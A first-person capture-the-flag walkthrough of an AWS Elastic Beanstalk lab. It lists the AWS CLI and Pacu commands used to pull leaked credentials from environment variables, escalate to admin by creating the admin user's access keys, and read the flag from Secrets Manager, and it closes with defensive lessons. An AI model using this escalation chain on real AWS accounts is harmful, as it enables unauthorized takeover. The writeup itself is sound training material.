AWS Beanstalk Secrets CTF Walkthrough
Overview
In this capstone challenge, I tackled the Beanstalk Secrets scenario on GitHub. This scenario was based on a real AWS penetration test and presented an excellent opportunity to practice cloud security skills.
One interesting aspect of this challenge was that it required research on the AWS Elastic Beanstalk service, which wasn’t explicitly covered in previous training materials. This reflects real-world penetration testing, where you often need to research and enumerate unfamiliar services.
Scenario
I was hired as an AWS Penetration Tester for Hack Smarter. The company uses Elastic Beanstalk to host some of their public-facing web applications. I was provided with a low-level account that has access to Elastic Beanstalk.
Mission Objectives:
- Research Elastic Beanstalk and identify common misconfigurations
- Leverage findings to escalate privileges to admin access
Initial Reconnaissance
First, I configured AWS CLI with the provided low-privilege credentials and began basic enumeration:
1 | aws sts get-caller-identity --profile init |
I attempted to gather more information about the user but faced permission restrictions:
1 | aws iam get-user --profile init |
Permission Exploration
I tried to determine what policies were attached to the user:
1 | aws iam list-attached-user-policies --user-name cgidmws70jym0c_low_priv_user --profile init |
Group membership was also restricted:
1 | aws iam list-groups-for-user --user-name gidmws70jym0c_low_priv_user --profile init |
Role listing was blocked as well:
1 | aws iam list-roles --profile init |
Leveraging Pacu for AWS Enumeration
Since manual enumeration was hitting roadblocks, I turned to Pacu, an AWS exploitation framework. First, I tried exploring DynamoDB:
1 | Pacu (init:imported-init) > run dynamodb__enum --regions eu-west-1 |
Discovering Secrets in Elastic Beanstalk
Given the scenario hint about Elastic Beanstalk, I focused on enumerating that service using Pacu:
1 | Pacu (init:imported-init) > run elasticbeanstalk__enum |
This was the key finding! The Elastic Beanstalk environment contained environment variables with secondary AWS credentials. This is a common misconfiguration where secrets are stored in plaintext environment variables.
Privilege Escalation: First Step
Using the discovered secondary credentials, I configured a new AWS CLI profile and verified the identity:
1 | aws sts get-caller-identity --profile sec |
I gathered more information about this secondary user:
1 | aws iam get-user --profile sec |
The Final Escalation
I ran Pacu’s privilege escalation scanner to identify potential paths to admin access:
1 | Pacu (sec:imported-sec) > run iam__privesc_scan |
The scan revealed that the secondary user had the iam:CreateAccessKey
permission for the admin user! This is a critical permission that allows creating new access keys for other users.
1 | [iam__privesc_scan] Running module iam__backdoor_users_keys... |
I now had admin credentials and verified the identity:
1 | aws sts get-caller-identity --profile admin |
Capturing the Flag
With admin access, I could now enumerate AWS Secrets Manager to find the flag:
1 | Pacu (admin:imported-admin) > run secrets__enum --region us-east-1 |
The flag was: FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}
Key Lessons Learned
- Environment Variable Exposure: Storing sensitive credentials in plaintext environment variables is a dangerous practice that can lead to privilege escalation.
- Lateral Movement: I leveraged one set of credentials to discover another, ultimately leading to admin access.
- Access Key Creation: The ability to create access keys for other users is extremely powerful and should be tightly controlled.
- Targeted Enumeration: Focusing on the service mentioned in the scenario (Elastic Beanstalk) paid off and directed the exploitation path.
This CTF challenge demonstrates a realistic AWS attack path that security professionals might encounter in real-world penetration tests. Understanding these attack vectors is crucial for cloud security practitioners to properly secure their AWS environments.